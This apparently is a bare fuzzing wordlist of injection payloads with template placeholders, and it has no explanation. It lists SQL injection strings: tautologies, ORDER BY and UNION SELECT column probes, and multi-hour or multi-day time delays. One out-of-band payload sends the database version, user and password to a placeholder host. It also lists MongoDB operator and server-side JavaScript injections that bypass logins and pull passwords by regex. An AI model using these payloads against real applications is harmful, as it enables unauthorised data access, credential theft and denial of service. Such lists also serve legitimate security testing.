{INPUT_COMPLETE} AND 1={TOGGLE} {FORCE_END}
{INPUT_COMPLETE} AND 1='{TOGGLE} {FORCE_END}
{INPUT_COMPLETE} AND 1="{TOGGLE} {FORCE_END}
{INPUT_COMPLETE} OR 1='{TOGGLE} {FORCE_END}
{FORCE_END}
{INPUT_COMPLETE}
{INPUT_COMPLETE}{FORCE_END}
{INPUT_COMPLETE} ORDER BY 1{FORCE_END}
{INPUT_COMPLETE} ORDER BY 2{FORCE_END}
{INPUT_COMPLETE} ORDER BY 3{FORCE_END}
{INPUT_COMPLETE} ORDER BY 4{FORCE_END}
{INPUT_COMPLETE} ORDER BY 5{FORCE_END}
{INPUT_COMPLETE} ORDER BY 6{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL,NULL{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL,NULL,NULL{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL,NULL,NULL,NULL{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL,NULL,NULL,NULL,NULL{FORCE_END}
{INPUT_COMPLETE} UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL{FORCE_END}
(select(*)from(select(sleep(8640)))shahmidoe){FORCE_END}
6 days elapsed,;WAITFOR DELAY '144:00:00'{FORCE_END}
SELECT load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\test.txt'))
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
{"$gt": ""}
[$ne]=1
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true